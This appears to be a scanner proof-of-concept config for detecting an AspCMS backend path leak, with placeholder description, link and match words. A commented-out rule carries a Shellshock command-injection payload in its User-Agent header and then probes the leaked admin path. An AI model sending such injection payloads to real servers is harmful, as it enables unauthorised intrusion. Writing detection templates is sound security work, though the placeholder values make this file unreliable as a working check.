name = poc-yaml-aspcms-backend-leak
type = Passive
enabled = true
detail = {
    severity = High
    confidence = Certain
    author = "Hzllaga"
    description = """description 123456"""
    links = [
        "https://www.onebug.org/wooyundata/65458.html"
        "bbb"
    ]
}
variables = {
    r1 = "randomInt(200, 300)"
    r2 = "randomString(r1)"
}
rulesCondition = Or
rules = [
    {
        matchersCondition = Or
        matchers = [
            {
                part = RequestBody
                type = Word
                values = [
                    "asdawdawd"
                    "bababab"
                ]
                condition = Or
            }
            {
                part = Status
                type = Word
                values = [ "200" ]
            }
            {
                part = ResponseTime
                values = [ "4000-5000" ]
            }
        ]
    }
#     {
#         method = GET
#         path = "/plug/oem/AspCms_OEMFun.asp"
#         headers = {
#             User-Agent = "() { :; }; echo; echo; /bin/bash -c 'expr #{r1} + #{r2}'"
#             bar = "22"
#         }
#         expression = """response.status == 200 && "<script>alert".bmatches(response.body) && "top.location.href='(.*?)';".bmatches(response.body)"""
#         search = """(?P<path>(/(.*?).asp))"""
#     }
#     {
#         method = GET
#         path = "/{{path}}"
#         expression = """response.status == 200 && response.body.bcontains(b"username") && response.body.bcontains(bytes(string(r1 + r2))) """
#     }
]
